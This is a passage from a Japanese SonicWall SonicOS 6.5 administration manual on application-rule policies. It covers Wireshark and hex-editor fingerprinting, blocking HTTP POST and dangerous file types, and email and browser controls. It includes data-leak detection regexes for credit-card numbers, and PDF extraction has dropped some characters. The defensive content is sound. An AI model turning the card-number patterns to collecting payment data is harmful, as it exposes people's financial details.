9 「動作オブジェク ト」 で、 ポリシー種別に当てはまる動作を含むドロップダウン メニューから動

作を選択します。 使用可能なオブジェク トには、 定義済みのアクションと、 適用可能なユーザ定義のアクションが含まれます。 既定値は、 いずれのポリシー種別も 「リセッ ト /破棄」 です。

10 「ユーザ/グループ」 で、 「包含」 と 「除外」 の両方についてドロップダウン メニューから選択

を行います。 「除外」 で選択されたユーザまたはグループは、 ポリシーの影響を受けません。

11 ポリシー種別が 「SMTP クライアン ト」 の場合は、 「包含」 と 「除外」 の両方について 「メール

送信者」 と 「メール受信者」 のドロップダウン メニューから選択を行います。 「除外」 で選択

されたユーザまたはグループは、 ポリシーの影響を受けません。

12 「スケジュール」 で、 ポリシーを有効にするさまざまなスケジュールを含むドロップダウン メニューから選択を行います。

既定である 「常に有効」 以外のスケジュールを指定すると、 スケジュールで設定された時間帯にのみルールが有効になります。 例えば、 業務に関係のないサイ トへのアクセスを遮断するポリシーに対して 「勤務時間」 を指定すると、 業務時間外にそう したサイ トへのアクセスを許可することができます。

13 一致が見つかったときにログ エント リを作成するポリシーにする場合は、 「ログを有効にする」

チェ ッ クボックスをオンにします。

14 ログに詳細な情報を記録するには、 「個々のオブジェク ト コンテンツのログ」 チェ ックボック

スをオンにします。

15 ポリシー種別が 「IPS コンテンツ」 の場合は、 「IPS メ ッセージ形式を使用したログ」 チェ ック

ボッ クスをオンにします。 これで、 ログ エン ト リ内の種別は "アプリケーシ ョ ン制御" ではな

く "侵入防御" と表示され、 ログ メ ッセージ内では "アプリケーシ ョ ン制御の警告" ではな く

"IPS 検出警告" のような接頭辞が使われるようになります。 これは、 ログ フ ィルタを使用して

IPS に関する警告を検索する場合に便利です。

16 ポリシー種別が 「アプリケーシ ョ ン制御コンテンツ」 の場合は、 ログ エン ト リ内の種別を "アプリケーシ ョ ン制御" と表示し、 ログ メ ッセージ内で "アプリケーシ ョ ン制御検出警告" のよう

な接頭辞を使用するために、 「アプリケーシ ョ ン制御メ ッセージ形式でログする」 チェ ッ クボックスをオンにします。 これは、 ログ フ ィルタを使用してアプリケーシ ョ ン制御に関する警

告を検索する場合に便利です。

メモ : 一致オブジェ ク ト種別が 「個別オブジェ ク ト」 に設定されている場合、 「除外一致オブジェ ク ト」 は有効になりません。 個別オブジェ ク トは除外一致オブジェ ク ト と して選択できません。

ヒン ト : ログのみのポリシーの場合は、 「動作なし」 を選択します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定44

17 「ログ冗長フ ィルタ」 で、 「グローバル設定を使用」 を選択して 「ルール > アプリケーシ ョ ン

制御」 ページで設定されたグローバル値を使用するか、 このポリシーの各ログエン ト リ間の遅延を秒数で入力します。 グローバル設定よりも優先されるローカル設定の対象となるのはこのポリシーのみです。 他のポリシーは影響を受けません。

18 「接続側」 で、 ドロップダウン メニューから目的の接続側を選択します。 利用できる選択肢は

ポリシー種別に依存し、 含まれる可能性があるのは 「クライアン ト側」 、 「サーバ側」 、 または 「両方」 であり、 これらはト ラフ ィ ッ クがどちら側で発生したかを表します。 ポリシー種別が 「IPS コンテンツ」 または 「アプリケーシ ョ ン制御コンテンツ」 の場合、 この設定オプシ ョ

ンはありません。

19 「方向」 で、 「基本」 または 「詳細」 のどちらかを選択し、 ドロップダウン メニューから方向

を選択します。 「基本」 の場合は、 「受信」 、 「送信」 、 または 「両方」 を選択できます。「詳細」 の場合は、 ゾーン間の方向 (例えば LAN から WAN) を選択できます。 ポリシー種別が

「IPS コンテンツ」 または 「アプリケーシ ョ ン制御コンテンツ」 の場合、 この設定オプシ ョ ン

はありません。

20 ポリシー種別が 「IPS コンテンツ」 または 「アプリケーション制御コンテンツ」 の場合は、 「ゾー

ン」 ドロップダウン メニューからゾーンを選択します。 ポリシーはこのゾーンに適用されます。

21 「OK」 を選択します。

アプリケーシ ョ ン ルール ウィザードを使用するアプリケーシ ョ ン ルール ウィザードを使用すると、 多 くの一般的な使用事例に対する安全な設定を

行う ことができます。 ただし、 すべての状況に対応できるわけではありません。 ウィザードを使用していて必要なオプシ ョ ンが見つからない場合は、 いつでも 「キャンセル」 を選択し、 手動による設定に切り替えるこ とができます。 手動による設定では、 一致オブジェ ク ト、 動作、 電子メール ユーザ

オブジェク ト (必要な場合)、 およびこれらを参照するポリシーなど、 すべてのコンポーネン ト を設定

する必要があります。 情報の参照先:

• アプリケーション ルール ガイド (ウィザード ) については、 『SonicOS クイック設定』 技術ドキュ

メン トの 「アプリケーシ ョ ン ルール ガイ ド (ウィザード ) の使用」 を参照して ください。

• 手動でのポリシー作成手順については、 アプリケーシ ョ ンルールポリシーの設定 (42 ページ) を参照して ください。

アプリケーシ ョ ン ルール設定の確認ポリシー設定を確認するには、 ポリシーに一致する ト ラフ ィ ッ クを送信します。 Wireshark™ などの

ネッ トワーク プロ ト コル アナライザを使用すると、 パケッ ト を表示できます。 Wireshark の使用法に

ついては、 Wireshark (46 ページ) を参照して ください。

包含されるユーザとグループおよび除外されるユーザとグループの両方についてテス ト して く ださい。 さらに、 設定したスケジュールに従ってテスト を実行して、 ポリシーが意図されたとおりに動作することを確認します。 SonicOS 管理インターフ ェースの 「調査」 ビューのイベン ト ログページでロ

グのログエン ト リを確認します。

「ルール > アプリケーシ ョ ン ルール」 ページで各ポリシーをマウスでポイン トすると、 ツール チッ

プを表示できます。 ツール チップには、 そのポリシーの一致オブジェ ク ト と動作の詳細が表示され

ます。 また、 ページ下部には、 定義されたルールの数が表示されます。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定45

便利なツールこのセクシ ョ ンでは、 アプリケーシ ョ ン ルールを 大限に利用するための 2 つのソフ トウェア ツー

ルについて説明します。 次のツールについて説明します。

• Wireshark (46 ページ)

• 16 進エディ タ (48 ページ)

WiresharkWireshark は、 アプリケーシ ョ ンからネッ トワーク上に送出されるパケッ ト を監視するネッ トワーク

プロ ト コル アナライザです。 パケッ ト をチェ ッ クするこ とで、 アプリケーシ ョ ンの一意な識別子を

調べるこ とができます。 この情報を基に、 アプリケーシ ョ ン ルール ポリシーで使用する一致オブ

ジェク ト を作成します。

Wireshark は、 以下のサイ トから無料で入手できます。 http://www.wireshark.org

次に示すパケッ ト監視手順で、 ウェブ ブラウザの一意な識別子またはシグネチャを調べる手順を示

します。

1 Wireshark で、 「Capture > Interfaces」 を選択して、 ローカル ネッ トワーク インターフェースを

表示します。

2 「Capture Interfaces」 ダイアログ ボックスで、 「Capture」 を選択してメイン ネッ トワーク インターフェース上でのキャプチャを開始します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定46

キャプチャを開始したらブラウザを起動し、 その後、 キャプチャを停止します。 この例では、Firefox を起動しています。

3 上部ペインのキャプチャされた出力の中で HTTP GET コマンドを見つけて選択して、 そのソース

を中央ペインに表示します。 ソース コード内で、 User-Agent で始まる行を見つけます。

4 右側にスクロールしてブラウザの一意な識別子を調べます。 この例では、 Firefox/1.5.0.7 です。

5 「一致オブジェク トの設定」 ウィンドウの 「内容」 テキスト フ ィールドに識別子を入力します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定47

6 「OK」 を選択して、 ポリシーで使用可能な一致オブジェク ト を作成します。

16 進エディ タ

16 進エディ タを使用すると、 ファイルまたはグラフ ィ ッ ク イ メージを 16 進形式で表示できます。 16進エディ タの 1 つに、 Christian Maas 氏によって開発された XVI32 があります。 この 16 進エデ ィ タ

は、 次の URL から無料で入手できます。

http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm

例えば、 機密扱いの社内向け文書のすべてに特定のグラフ ィ ッ クが含まれている場合は、 16 進エ

ディ タを使用してグラフ ィ ッ クに固有の識別子を取得し、 その固有の 16 進文字列を使用して一致オ

ブジェク ト を作成します。 ポリシー内でこの一致オブジェク ト を参照することで、 このグラフ ィ ッ クにコンテンツが一致するファイルの転送を遮断できます。

SonicWall のグラフ ィ ッ クを例に使用してグラフ ィ ックの一致オブジェク ト を作成するには:

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定48

1 XVI32 を起動し、 「File > Open」 を選択してグラフ ィ ッ ク イメージ GIF ファイルを開きます。

2 左ペインで、 「Edit > Block <n> chars…」 を選択します。 次に、 「decimal」 オプシ ョ ンを選択し、

表示されるスペースに 「50」 と入力して、 初の 50 個の 16 進文字ブロックをマークします。

これにより、 フ ァイルの 初の 50 文字がマークされます。 個別一致オブジェ ク トで使用する

一意の拇印を生成するには、 これで十分です。

または、 次の手順に従ってブロックをマークします。

• 初の文字 (#0) を選択します。

• Ctrl+B を押します。

• 位置 #49 の文字を選択します。

• Ctrl+B を押します。

位置#49 の文字を見つけるには、 右ペイン (テキス ト ペイン) 内の文字を選択し、 左下隅に表示

される情報から 10 進アドレスを確認します。 選択する文字を変えながら、 「Adr. dec: 49」 。

ブロックをマークすると、 フォン トの色が赤に変わります。 文字ブロックのマークを解除するには、 Ctrl+U を押します。

メモ : Ctrl+B キーを押してブロッ クをマークする前に、 左ペインの対応する位置を選択す

る必要があります。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定49

3 ブロックをマークしたら、 「Edit > Clipboard > Copy As Hex String」 を選択します。

4 マルチ機能のテキスト エディ タで、 「Ctrl+V」 を押して選択内容を貼り付け、 Enter を押して行

を改行します。

この中間の手順は、 16 進文字列からスペースを削除するために必要です。

5 テキスト エディ タで、 「検索 > 置換」 を選択して 「置換」 ダイアログ ボックスを表示します。

「Replace」 ダ イアログ ボ ッ クスで、 「Find」 テキス ト ボ ッ ク スにスペースを入力し、

「Replace」 テキス ト ボックスは空白のままにしておきます。 「Replace All」 を選択します。

これで、 文字間にスペースを含まない 50 個の 16 進文字から構成される 16 進文字列が得られ

ます。

6 16 進文字列をダブルクリ ックして選択し、 Ctrl+C を押してクリ ップボードにコピーします。

7 SonicOS ユーザ インターフェースで、 「オブジェク ト > 一致オブジェク ト」 を選択し、 「一致オ

ブジェク トの作成」 を選択します。

8 「一致オブジェ ク トの設定」 ダイアログで、 わかりやすいオブジェ ク ト名を 「オブジェ ク ト名」 フ ィールドに入力します。

9 「一致オブジェク ト種別」 ドロップダウン メニューで、 「個別オブジェク ト」 を選択します。

10 「入力形式」 で、 「16 進数」 を選択します。

11 「内容」 フ ィールドで、 Ctrl+V キーを押してクリ ップボードの内容を貼り付けます。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定50

12 「追加」 を選択します。

13 「OK」 を選択します。

これで、 イ メージの一意な識別子を含んだ一致オブジェク トが作成されました。 次は、 この一致オブジェク ト と一致するイメージを含むト ラフ ィ ッ クを遮断したりログに記録したりするアプリケーシ ョ ン ルール ポリシーを作成します。 ポリシーの作成については、 アプリケーシ ョ

ンルールポリシーの設定 (42 ページ) を参照して ください。

アプリケーシ ョ ン ルールの使用例アプリケーシ ョ ン ルールは、 い く つかのタイプのアクセス制御を効率的に処理する機能を提供しま

す。 このセクシ ョ ンでは、 以下の使用事例を紹介します。

• 一致オブジェク トでの正規表現の作成 (52 ページ)

• ポリシーベースのアプリケーシ ョ ン ルール (53 ページ)

• アプリケーシ ョ ン シグネチャ ベース ポリシーのログ (54 ページ)

• コンプライアンスの施行 (55 ページ)

• サーバの保護 (55 ページ)

• ホスト される電子メール環境 (55 ページ)

• 電子メール制御 (56 ページ)

• ウェブ ブラウザ制御 (57 ページ)

• HTTP POST 制御 (58 ページ)

• 禁止するファイル タイプ制御 (60 ページ)

• ActiveX コン ト ロール (62 ページ)

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定51

• FTP 制御 (64 ページ)

• 帯域幅管理 (70 ページ)

• DPI を迂回する (70 ページ)

• 個別のシグネチャ (72 ページ)

• リバース シェル悪用の防御 (75 ページ)

一致オブジェク トでの正規表現の作成定義済みの正規表現を設定時に選択できます。 また、 個別正規表現を設定することもできます。 この使用事例では、 クレジッ ト カード番号の Regex 一致オブジェク トの作成方法を説明しつつ、 い くつか

の一般的なエラーについても示します。

例えば、 次の非効率的で少し間違った構文を使用して、 クレジッ ト カード番号に対する Regex 一致オ

ブジェク ト を作成するとします。

[1-9][0-9]{3} ?[0-9]{4} ?[0-9]{4} ?[0-9]{4}

ユーザはこのオブジェ ク ト を使用してポリシーを作成しよ う と します。 ユーザが [OK] をク リ ッ クす

ると、 SonicWall セキュリテ ィ装置には "お待ち ください…" という メ ッセージが表示されますが、 管理

セッシ ョ ンが非常に長時間無反応になり、 結果的に正規表現が拒否されることがあります。

このような動作の原因は、 個別オブジェク ト とフ ァイル内容一致オブジェク トでは、 正規表現の前に暗黙的にド ッ ト とアスタ リスク (.*) が付く ことです。 ド ッ トは、 '\n' を除く 256 文字の ASCII 文字す

べてと一致します。 このことや、 使用されている一致オブジェク ト種別や、 正規表現の性質が相まって、 制御プレーンが必要なデータ構造をコンパイルするのに長い時間がかかります。

解決策は、 正規表現の前に '\D' を付けることです。 これは、 クレジッ ト カード番号の前に数字以外の

文字が付き、 実際に正規表現がより正確になるという ことを意味します。

さらに、 上記の正規表現は、 対象のクレジッ ト カード番号を必ずしも正確に表していません。 現在の形の正規表現では、 1234 12341234 1234 など、 い くつかの誤検出に一致する可能性があります。

より正確な表現は以下のようになります。

\D[1-9][0-9]{3} [0-9]{4} [0-9]{4} [0-9]{4}

または

\D[1-9][0-9]{3}[0-9]{4}[0-9]{4}[0-9]{4}

より簡潔な表現は、 それぞれ

\D\z\d{3}( \d{4}){3}

または

\D\z\d{3}(\d{4}){3}

となります。

これらは、 1 つの一致オブジェク トの中に 2 つの正規表現として記述することも、 以下のように 1 つの正規表現に圧縮することもできます。

\D\z\d{3}(( \d{4}){3}|(\d{12}))

次の正規表現を使用して、 数字を '-' で区切ってクレジッ ト カード番号をキャプチャすることもでき

ます。

\D\z\d{3}(( \d{4}){3}|(-\d{4}){3}|(\d{12}))

先行する '\D' は、 これらすべての正規表現に含める必要があります。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定52

ポリシーベースのアプリケーシ ョ ン ルールSonicWall のアプリケーシ ョ ン シグネチャ データベースはアプリケーシ ョ ン制御機能の一部であり、

ポリシー設定とそれらに関連する動作に対するきめ細かな制御を可能にします。 これらのシグネチャ

データベースは、 アプリケーシ ョ ンの脆弱性だけでな くワーム、 ト ロイの木馬、 ピアツーピア転送、スパイウェア、 裏口侵入企図からもユーザを保護するために使用されます。 また、 SonicWall の再組

み立て不要の精密パケッ ト検査エンジンで使用されている広範なシグネチャ言語により、 アプリケーシ ョ ンおよびプロ ト コルで新たに見つかった脆弱性に対する事前対処的な防御を実現します。

アプリケーシ ョ ン ルール ポリシーを作成するには、 まずアプリケーシ ョ ン リス ト タイプの一致オブ

ジェク ト を作成します。

アプリケーシ ョ ンを対象と した一致オブジェク トの例に、 LimeWire および Kazaa のピアツーピア共有

アプリケーシ ョ ンを対象とした一致オブジェク トの例を示します。

アプリケーシ ョ ンを対象とした一致オブジェク トの例

アプリケーシ ョ ン ベースの一致オブジェ ク ト を作成したら、 この一致オブジェ ク ト を使用するアプ

リケーシ ョ ン制御コンテンツ タイプの新しいアプリケーシ ョ ン ルール ポリシーを作成します。 一致

オブジェ ク ト を使用するアプリケーシ ョ ン制御ポリシーの例に示すアプリケーシ ョ ン制御ポリシーは、 先ほど作成したばかりの “Napster/LimeWire P2P" 一致オブジェク ト を使用して、 すべての Napsterおよび LimeWire ト ラフ ィ ッ クを破棄するものです。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定53

一致オブジェク ト を使用するアプリケーシ ョ ン制御ポリシーの例

アプリケーシ ョ ン シグネチャ ベース ポリシーの

ログ他の一致オブジェク ト ポリシーのタイプと同様、 アプリケーシ ョ ン コンテンツ ポリシーでもログを

有効にできます。 既定では、 これらのログが標準形式で表示されます。 ここでは、 警告/動作を開始

したアプリケーシ ョ ン ルール ポリシーが表示されています。 標準ログを参照して く ださい。 ログ イベン トに関する詳細を参照するには、 そのポリシーに対する 「アプリケーシ ョ ン制御ポリシーの編集」 ダイアログの 「アプリケーシ ョ ン制御メ ッセージ形式でログする」 チェ ッ クボッ クスをオンにします。 アプリケーシ ョ ン制御形式のログを参照して く ださい。

標準ログ

アプリケーシ ョ ン制御形式のログ

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定54

コンプライアンスの施行多くの企業や組織では、 送信ファイル転送に関するポリシーを確実に順守することが求められています。 アプリケーシ ョ ン ルールは、 HTTP、 FTP、 POP3、 および SMTP の各コンテキス トにおいてこの機

能を提供します。 これにより、 企業は、 HIPAA、 SOX、 および PCI などの規制要件を満たすことができ

ます。

この目的のポリシーを設定する場合、 「方向 > 基本 > 送信」 を選択して、 明確にファイル転送制限を

送信ト ラフ ィ ッ クに適用できます。 また、 「方向 > 詳細設定」 を選択し、 フ ァ イル転送を防止する

ゾーンを指定することもできます。 例えば、 LAN から WAN や LAN から DMZ などのゾーンのほか、 自

分で定義したゾーンを指定できます。

サーバの保護通常、 サーバは、 多くの信頼されないクライアン トからアクセスされます。 これらの貴重なリソースの 善の保護手段として、 複数の防御線を設置する必要があります。 ゲートウェイにアプリケーシ ョン ルールを導入するこ とで、 サーバを保護するためのポリシーを設定できます。 例えば、 すべての

put FTPコマンドを遮断するポリシーを作成して、 ユーザがサーバにファイルを書き込むことを禁止で

きます (FTP コマンドの遮断 (68 ページ) を参照して く ださい)。 サーバ自体が読み取り専用と設定され

ている場合であっても、 このような対策を施すことで、 ファイアウォール管理者によって制御されるセキュリテ ィが追加されます。 ミス、 パッチの副作用、 または悪意のある何者かによって設定が変更された場合でも、 サーバは保護されます。 アプリケーシ ョ ン ルールを使用すると、 HTTP、 SMTP、POP3、 および FTP を使用したサーバへのコンテンツのアップロードを効果的に制御できます。

サーバに影響を与えるポリシーの例と して、 ラ ッ クに設置されたサーバを使用して 3 つのレベルの

サービスを顧客に提供する小規模の ISP があります。 ゴールド レベルでは、 顧客はウェブ サーバ、 電

子メール サーバ、 および FTP サーバをホス トできます。 シルバー レベルでは、 顧客はウェブ サーバ

と電子メール サーバをホス ト できます。 ブロンズ レベルのホステ ィ ング パッケージでは、 ウェブ

サーバのみが許可されます。 この ISP は、 アプリケーシ ョ ン ルールを使用してそれぞれの顧客に対し

てポリシーを作成することで、 このような制限を実現できます。

ホス ト される電子メール環境ホスト される電子メール環境とは、 ユーザのインターネッ ト サービス プロバイダ (ISP) において電子

メールが利用可能な環境です。 通常、 この環境の電子メール転送用プロ ト コルには POP3 が使用され

ます。 多くの小規模企業のオーナは、 このモデルを使用していて、 電子メール添付ファイルだけでなく電子メール コンテンツも制御したいと考えています。 ゲートウェイ上でアプリケーシ ョ ン ルール

を実行することで、 SMTP ベースの電子メールに加えて POP3 ベースの電子メールを制御するためのソ

リューシ ョ ンが提供されます。

アプリケーシ ョ ン ルールでは HTTP もスキャンできるので、 Yahoo や Gmail などのサイ トでホス ト さ

れる電子メールにも有用です。 HTTP を使用しているときに添付ファイルが遮断された場合、 アプリ

ケーシ ョ ン ルールは遮断されたファイルの名前を示しません。 また、 アプリケーシ ョ ン ルールを使

用して、 データベース サーバにアクセスするときに FTP を制御することもできます。

専用の SMTP ソ リ ューシ ョ ン と しては、 SonicWall Email Security を利用できます。 Email Security は、

SMTP ベースの電子メールの制御用に多くの大企業で採用されていますが、 POP3 をサポート していま

せん。 複数の電子メール プロ ト コルの制御用と して、 アプリケーシ ョ ン ルールは優れたソ リ ュー

シ ョ ンを提供します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定55

電子メール制御アプリケーシ ョ ン ルールは、 特に包括的なポリシーが必要な場合に、 特定のタイプの電子メール制

御に効果を発揮します。 例えば、 特定の形式 (.exe など) の添付ファイルの送信をユーザごとまたは

ド メイン全体で禁止できます。 このケースではファイル名の拡張子を照合するため、 添付ファイルの送信前に拡張子を変更すると、 フ ィルタを回避します。 電子メール サーバを所有している場合は電

子メール サーバ上でもこの方法で添付ファイルを防ぐこ とができます。 そうでない場合は、 アプリ

ケーシ ョ ン ルールがその機能を提供します。

フ ァイル内容から“社外秘"、 “社内限定使用"、 “機密"などに一致する文字列をスキャンする一致オブ

ジェク ト を作成して、 機密データの転送に関する基本的な制御を実現できます。

また、 特定のド メインまたはユーザとの間の電子メールの送受信を禁止するポリシーを作成することもできます。 アプリケーシ ョ ン ルールを使用すると、 添付フ ァ イルの数を制限するこ とな く 電子

メール フ ァ イル サイズを制限できます。 アプリケーシ ョ ン ルールでは、 MIME タ イプに基づいて

ファイルを遮断できます。 暗号化された SSL または TLS ト ラフ ィ ッ クは遮断できず、 また、 すべての

暗号化フ ァ イルを遮断するこ とはできません。 HTTPS を使っているサイ トからの暗号化された電子

メールを遮断するために、 HTTPS セッシ ョ ンを開始する前に送信される証明書を照合する個別一致オ

ブジェク ト を作成できます。 これは、 暗号化される前の SSL セッシ ョ ンの一部です。 それから、 証明

書を遮断する個別ポリシーを作成します。

アプリケーシ ョ ン ルールでは、 電子メールのテキストベースの添付ファイルまたは 1 レベル圧縮され

た添付フ ァイルをスキャンできますが、 暗号化された添付フ ァイルはスキャンできません。 次の表に、 アプリケーシ ョ ン ルールでキーワードをスキャンできるフ ァイル形式を示します。 他の形式に

ついては、 ポリシー内で使用する前にテストする必要があります。

キーワードをスキャン可能なファイル形式

ファイル タイプ 一般的な拡張子

C ソース コード c

C+ソース コード cpp

カンマ区切り値 csv

HQX アーカイブ hqx

HTML htm

Lotus 1-2-3 wks

Microsoft Access mdb

Microsoft Excel xls

Microsoft PowerPoint ppt

Microsoft Visio vsd

Microsoft Visual Basic vbp

Microsoft Word doc

Microsoft Works wps

Portable Document Format pdf

リ ッチ テキスト形式 rtf

SIT アーカイブ sit

テキスト ファイル txt

WordPerfect wpd

XML xml

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定56

ウェブ ブラウザ制御アプリケーシ ョ ン ルールを使用すると、 望まし く ないブラウザからウェブ サーバを保護することも

できます。 アプリケーシ ョ ン ルールには、 Netscape、 MSIE、 Firefox、 Safari、 および Chrome 用の一致

オブジェ ク ト タイプが用意されています。 これらのタイプのいずれかを使用して一致オブジェ ク ト

を定義し、 ポリシー内でオブジェク ト を参照することで、 該当するブラウザを遮断できます。

また、 HTTP ユーザ エージェン ト 一致オブジェク ト タイプを使用すると、 ブラウザ バージ ョ ン情報に

アクセスできます。 例えば、 バージ ョ ンが古いブラウザは、 どのブラウザであってもセキュリテ ィ上の問題がある可能性があり ます。 アプ リケーシ ョ ン ルールを使用する と、 問題があるブラウザ

(Internet Explorer など) からのアクセスを禁止するポリシーを作成できます。 さらに、 不一致検索を使

用し て、 目的のブラウザ以外のすべてのブラウザを除外する こ と もできます。 例えば、 InternetExplorer のバージ ョ ン 9 には欠陥があり、 バージ ョ ン 11 についてはまだテスト していないという理由

で、 Internet Explorer バージ ョ ン 10 のみを許可するよ う に設定できます。 これを実現するには、

Wireshark のよ うなネッ トワーク プロ ト コル アナライザを使用して、 IEv6 のウェブ ブラウザ識別子

(MSIE 10) を調べます。 次に、 コンテンツに“MSIE 10"を指定し、 不一致検索を有効に設定した HTTPユーザ エージェン ト タイプの一致オブジェク ト を作成します。

この一致オブジ ェ ク ト をポ リ シー内で使用する と、 MSIE 10 以外のブ ラウザを遮断できます。

Wireshark を使用してウェブ ブラウザ識別子を調べる方法については、 Wireshark (46 ページ) を参照し

て ください。 不一致検索については、 不一致検索について (160 ページ) を参照して ください。

ウェブ ブラウザ アクセスの制御に関するも う 1 つの使用事例は、 外国からのディスカウン ト商品を

販売する小規模の e コマース サイ トがあります。 サプライヤとの契約において輸入元の国に在住する

Tar アーカイブ (“tarball") tar

ZIP アーカイブ zip、 gzip

キーワードをスキャン可能なファイル形式

ファイル タイプ 一般的な拡張子

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定57

ユーザには販売できないことが規定されている場合、 主要なウェブ ブラウザの国内バージ ョ ンから

のアクセスを遮断するようにアプリケーシ ョ ン ルールを設定できます。

アプリケーシ ョ ン ルールは、 一般的な各種ブラウザの定義済み選択をサポート します。 さ らに、 個

別一致オブジェク ト と して他のブラウザを追加できます。 ブラウザの遮断は、 ブラウザから報告される HTTP ユーザ エージェン トに基づいて行われます。 個別一致オブジェク トには、 ブラウザを正確に

識別するのに十分なコンテンツを含める必要があります。 Wireshark またはその他のネッ トワーク プロ ト コル アナライザを使用すると、 目的のブラウザの一意なシグネチャを取得できます。

HTTP POST 制御HTTP POST メ ソ ッ ド を禁止するこ とによって、 読み取り専用の公開 HTTP サーバのセキュ リテ ィ を強

化できます。

HTTP POST を禁止するには:

1 メモ帳などのテキスト エディ タを使用して、 以下の HTML コードが含まれる Post.htm という名

前の新しいドキュ メン ト を作成します。

<FORM action="http://www.yahoo.com/" method="post"><p>Please enter your name: <input type="Text" name="FullName"></p><input type="submit" value="Submit"> <INPUT type="reset">

2 このファイルをデスク ト ップなどの都合のいい場所に保存します。

3 Wireshark ネッ トワーク アナライザを開き、 キャプチャを開始します。 Wireshark の使用法につ

いては、 Wireshark (46 ページ) を参照して ください。

4 先ほど作成した Post.htm ファイルをブラウザで開きます。

5 自分の名前を入力します。

6 「適用」 を選択します。 キャプチャを終了します。

7 Wireshark の 「Edit > Find Packet」 機能を使用して、 POST という文字列を検索します。

Wireshark は、 要求されたデータが含まれる 初のフレームに移動します。 Wireshark の画面に

示すような画面が表示されます。 この画面は、 HTTP POST メ ソ ッ ドが TCP ヘッダー情報の直後

に送信されているこ と、 および TCP ペイロード (HTTP アプリケーシ ョ ン層) の 初の 4 バイ ト

(504f5354) で構成されているこ とを示しています。 この情報を基に、 HTTP POST メ ソ ッ ド を

検出する個別一致オブジェク ト を作成します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定58

Wireshark の画面

8 SonicOS 管理インターフェース管理 ビューで、 「ポリシー | オブジェク ト > 一致オブジェク ト」

に移動します。

9 「追加」 を選択し、 「一致オブジェク ト」 を選択します。

10 次に示すような一致オブジェク ト を作成します。

この特定の一致オブジェク トでは、 「設定を有効にする」 機能を使用して、 ペイロードの特定の部分を照合するオブジェク ト を作成します。 「オフセッ ト」 フ ィールドでは、 ペイロード内のどのバイ トから照合を開始するかを指定し、 照合をより限定的にすることで誤検出を 小限にします。 「深度」 フ ィールドでは、 どのバイ ト で照合を終了するかを指定します。 「 小値」 フ ィールド と 「 大値」 フ ィールドでは、 小ペイロード サイズと 大ペイロード サイ

ズを指定できます。

11 管理ビューで、 「ポリシー | ルール > アプリケーシ ョ ン ルール」 を開きます。

12 「追加」 を選択します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定59

13 次に示すようなポリシーを作成します。

14 テストのために、 前に作成した Post.htm ファイルをブラウザで開きます。

15 自分の名前を入力します。

16 「適用」 を選択します。 今回は接続が遮断され、 次に示すような警告がログに表示されるはずです。

禁止するファイル タイプ制御アプリケーシ ョ ン ルールを使用すると、 危険なファイル タイプや禁止されたファイル タイプ (exe、vbs、 scr、 dll、 avi、 mov など) のアップロードやダウンロードを防止できます。

危険なファイル タイプや禁止されたファイル タイプのアップロードまたはダウンロードを

防止するには、 以下の手順に従います。

1 管理ビューで、 「オブジェク ト > 一致オブジェク ト」 に移動します。

2 「追加」 を選択し、 「一致オブジェク ト」 を選択します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定60

3 次に示すようなオブジェク ト を作成します。

4 「オブジェク ト > 動作オブジェク ト」 に移動します。

5 「追加」 を選択します。

6 次に示すような動作を作成します。

このオブジェク ト と動作を使用するポリシーを作成するには、 以下の手順に従います。

1 「ルール > アプリケーシ ョ ン ルール」 に移動します。

2 「追加」 を選択します。

3 次に示すようなポリシーを作成します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定61

4 このポリシーをテストするために、 ウェブ ブラウザを開いて、 一致オブジェク トで指定した任

意のファイル タイプ (exe、 vbs、 scr) をダウンロード してみます。 次のような URL で試すこ

とができます。

〈http://download.skype.com/SkypeSetup.exe〉

〈http://us.dl1.yimg.com/download.yahoo.com/dl/msgr8/us/msgr8us.exe〉

〈http://g.msn.com/8reen_us/EN/INSTALL_MSN_MESSENGER_DL.EXE〉

次に示すような警告が表示されます。

ActiveX コン ト ロールアプリケーシ ョ ン ルールの も有用な機能の 1 つは、 異なるタイプの ActiveX または Flash ネッ トワー

ク ト ラフ ィ ッ クを識別する機能です。 これにより、 ゲームを遮断する一方で、 Windows アップデー

ト を許可できます。 アプリケーシ ョ ン ルールを導入する前は、 「セキュ リテ ィ サービス > コンテン

ツ フ ィルタ」 を使用して ActiveX を遮断するように SonicOS を設定できましたが、 この方法ではソフ

トウェア更新を含むすべての ActiveX コン ト ロールが遮断されました。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定62

アプリケーシ ョ ン ルールでは、 HTML ソース内のクラス ID の値をスキャンすることで、 この識別が

可能になっています。 ActiveX のそれぞれのタイプは独自のクラス ID を持ち、 同一のアプリケーシ ョ

ンであってもバージ ョ ンが異なればクラス ID も異なる場合があります。

Active X のタイプとクラス ID に、 い くつかの ActiveX タイプとそのクラス ID を示します。

ActiveX の一致オブジェク トは、 Macromedia Shockwave のクラス ID を使用している ActiveX タイプの一

